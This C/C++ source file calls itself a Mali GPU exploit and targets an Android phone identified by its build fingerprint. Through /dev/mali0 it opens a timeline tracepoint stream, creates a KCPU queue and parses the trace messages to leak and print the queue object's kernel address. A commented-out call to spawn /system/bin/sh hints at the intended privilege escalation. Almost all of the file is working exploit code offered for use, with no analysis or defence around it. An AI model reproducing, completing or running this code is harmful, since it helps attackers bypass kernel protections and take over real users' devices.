#include <string>
#include "mali.h"
#include <iostream>  // For std::cout
#include <cstdint>   // For uint64_t (__u64 equivalent)


#define do_dbg(x, ...)
#define do_print(fmt, ...) do {                                         \
                __android_log_print(ANDROID_LOG_ERROR, "EXPLOIT", fmt, ##__VA_ARGS__ ); \
                printf(fmt, ##__VA_ARGS__);                             \
        } while(0)


#define U64_MAX         ((__u64)~0ULL)


struct device_config {
        const char *fingerprint;
};


struct device_config dev_conf[] = {
        [0] = {                /*mydevice*/
                "google/shiba/shiba:14/UD1A.231105.004/11010374:user/release-keys",
        }

};

struct device_config *conf = NULL;
struct device_config * get_device_config(void)
{
        const char* prop_name = "ro.vendor.build.fingerprint";
        char prop_value[PROP_VALUE_MAX];

        if (!__system_property_get(prop_name, prop_value)){
                do_print("Failed to read the property or property does not exist\n");
                exit(-1);
        }

        for(int i=0; i < sizeof(dev_conf)/sizeof(struct device_config);i++) {
                if (!strncmp(dev_conf[i].fingerprint, prop_value, strlen(dev_conf[i].fingerprint))) {
                        struct device_config *conf =  &dev_conf[i];
                        do_print("[+] Target device: '%s'\n",
                                 conf->fingerprint);
                        return conf;
                }

        }
        do_print("Failed to identify %s \n",prop_value);
        return NULL;
}


int open_device(const char* name) {
        int fd = open(name, O_RDWR);
        if (fd == -1) {
                perror( "cannot open %s");
                exit(1);
        }
        /* do_print("device %s opened \n",name); */
        return fd;
}

int kbase_api_handshake(int fd,struct kbase_ioctl_version_check *cmd)
{
        int ret = ioctl(fd,KBASE_IOCTL_VERSION_CHECK,cmd);
        if(ret) {
                perror("ioctl(KBASE_IOCTL_VERSION_CHECK)");
        }
        return ret;
}

int kbase_api_set_flags(int fd, struct kbase_ioctl_set_flags *flags)
{
        int ret = ioctl(fd,KBASE_IOCTL_SET_FLAGS,flags);
        if(ret) {
                perror("ioctl(KBASE_IOCTL_SET_FLAGS)");
        }
        return ret;
}


int kbasep_kcpu_queue_new(int fd)
{

        struct kbase_ioctl_kcpu_queue_new  info = {};
        int ret = ioctl(fd,KBASE_IOCTL_KCPU_QUEUE_CREATE,&info);
        if(ret) {
                perror("ioctl(KBASE_IOCTL_KCPU_QUEUE_CREATE)");
                exit(0);
        } else {
                //  do_print("Successfully created kcpu with id = %d \n",info.id); 
                return info.id;
        }
        return ret;
}

int kbase_api_tlstream_acquire(int fd, __u32 flags)
{

        struct kbase_ioctl_tlstream_acquire data = { .flags = flags};
        int ret = ioctl(fd,KBASE_IOCTL_TLSTREAM_ACQUIRE ,&data);
        if(ret < 0 ) {
                do_print("ioctl(KBASE_IOCTL_TLSTREAM_ACQUIRE): %s",strerror(errno));
        } else {
                do_dbg("Successfully set flags and file descriptor %d\n",ret);

        }
        return ret;
}


__u32 kbase_api_get_context_id(int fd)
{
        struct kbase_ioctl_get_context_id info = {};
        int ret = ioctl(fd,KBASE_IOCTL_GET_CONTEXT_ID,&info);
        do_dbg("kbase_api_get_context_id() id = %d\n",info.id);
        if(ret) {
                perror("ioctl(KBASE_IOCTL_GET_CONTEXT_ID)");
                exit(0);
        }
        return info.id;

}


struct kcpu_args {
        int fd;
        int streamfd;
        __u32 kcpu_id;
        __u32 kctx_id;
        __u64 kcpu_kaddr;
};

void fd_limit_up()
{
        struct rlimit lim = {};
        if(getrlimit(RLIMIT_NOFILE, &lim)) {
                perror("getrlimit");
                exit(-1);
        }
        lim.rlim_cur = lim.rlim_max;

        if(setrlimit(RLIMIT_NOFILE, &lim)){
                perror("setrlimit");
                exit(-1);
        }
}

__u64 get_kcpu_kaddr(struct kcpu_args *args)
{
#define KBASE_TL_KBASE_NEW_KCPUQUEUE 59

        struct kcpu_args *ta = args;

        char buf[0x1000] = {};
        ssize_t rb = 0;
        do {
                rb = read(ta->streamfd,buf,sizeof(buf));
                char *p = buf;
                for(ssize_t i=0; i < rb && rb > 0x24; i++, p++) {
                        __u32 msg_id =  *(__u32 *)(p );
                        __u32 id =  *(__u32 *)(p + (32 - 12));  /* kcpu_queue_id */
                        __u32 kid =  *(__u32 *)(p + (36 - 12)); /* kernel_ctx_id */

                        if((msg_id == KBASE_TL_KBASE_NEW_KCPUQUEUE) && (id == ta->kcpu_id) \
                           && (kid == (ta->kctx_id ))) {
                                __u64 kcpu_queue = *(__u64 *)(p + (24 - 12));
                                return kcpu_queue;
                        }

                }

        } while((rb >= 0) &&  ta->kcpu_kaddr  == 0);

        return 0;
}





#ifdef __cplusplus
extern "C"
#endif
int mali_exploit(void)
{
        int err = 0;

        conf = get_device_config();
        if(!conf)
                return -1;

        /* getchar(); */
        fd_limit_up();

        int fd = open_device("/dev/mali0");

        struct kbase_ioctl_version_check cmd = {.major = 1, .minor = -1};
        kbase_api_handshake(fd, &cmd);
        struct kbase_ioctl_set_flags flags = {0};
        kbase_api_set_flags(fd,&flags);

        struct kcpu_args *ta = (struct kcpu_args *)calloc(sizeof(*ta),1);
        ta->fd = fd;

        ta->streamfd = kbase_api_tlstream_acquire(ta->fd,BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS);
        if(ta->streamfd < 0) assert(1 == 0 && "Unable to have tlstream fd");

        ta->kctx_id = kbase_api_get_context_id(ta->fd);
        ta->kcpu_id =   kbasep_kcpu_queue_new(ta->fd);
        ta->kcpu_kaddr = get_kcpu_kaddr(ta); //useful for leaking kcpu_queue object address by looking for message id of KBASE_TL_KBASE_NEW_KCPUQUEUE. These messages are generated by the kbasep_kcpu_queue_new function every time a new kcpu_queue object is allocated.
        do_print("[+] Got the kcpu_id (%d) kernel address = 0x%llx  from context (0x%x)\n",
                 ta->kcpu_id,ta->kcpu_kaddr,ta->kcpu_id);
                
                // system("/system/bin/sh");

        return 0;
}


int main()
{
        setbuf(stdout, NULL);
        setbuf(stderr, NULL);
        return mali_exploit();
}


